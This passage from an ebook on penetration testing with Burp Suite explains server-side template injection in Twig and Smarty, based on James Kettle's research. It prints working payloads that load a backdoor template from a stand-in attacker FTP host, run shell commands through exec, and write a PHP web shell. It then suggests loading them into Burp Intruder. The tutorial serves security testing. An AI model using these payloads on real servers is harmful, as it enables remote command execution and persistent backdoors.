Using Burp Suite to exploit the vulnerability

Imagine you have a vulnerable application to SSTI that is using Twig. Twig (https://twig.symfony.com/) is a template engine developed in PHP.

We can detect the use of an engine because of the source code. Consider the following code snippet:

var greet = 'Hello $name'; 
<ul> 
<% for(var i=0; i<data.length; i++) 
{%> 
<li><%= data[i] %></li> 
<% } 
%> 
</ul> 
<div> 
<p> Welcome, {{ username }} </p> 
</div>

Here, we can see that the application is waiting for data to present the final website to the user. When PHP reads the template, it executes all of the things that are contained there. For example, in 2015, James Kettle published a vulnerability that allows injecting a backdoor in Twig using the following string:

{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}

Following the same idea, it is possible to execute any command, even getting shell, using the following string:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 
uid=1000(k) gid=1000(k) groups=1000(k),10(wheel)

This happens because, in the code, it is possible to inject any PHP function, without validation. Kettle showed the vulnerability in the source code, as demonstrated in the following:

public function getFilter($name){ 
[snip] 
   foreach ($this->filterCallbacks as $callback) { 
         if (false !== $filter = call_user_func($callback, $name)) { 
               return $filter; 
         } 
   } 
 
   return false; 
} 
public function registerUndefinedFilterCallback($callable){ 
   $this->filterCallbacks[] = $callable; 
}

Basically, the code accepts any kind of PHP function, so, in the string, Kettle entered the exec() function to execute a command directly to the server.

Twig is not the only engine that has problems. The other engines researched by Kettle included Smarty, another PHP engine that in theory disallows the direct use of the system() function. However, Kettle discovered that it allows invoking methods in other classes.

The vulnerable code snippet is shown in the following screenshot:

In this snippet of code, we can see that the getStreamVariable() method could be susceptible to read any file, with the server permissions. Furthermore, we can call other methods.

So, to execute a command on the server, Kettle showed us the following testing string:

{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ? 
>",self::clearConfig())}

Where we can add the command in the $_GET variable.

In Burp Suite, we can add these testing strings for different template engines as a list, and then launch the attack using the payloads options in the Intruder tool, as shown in the following screenshot:

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.219.208.117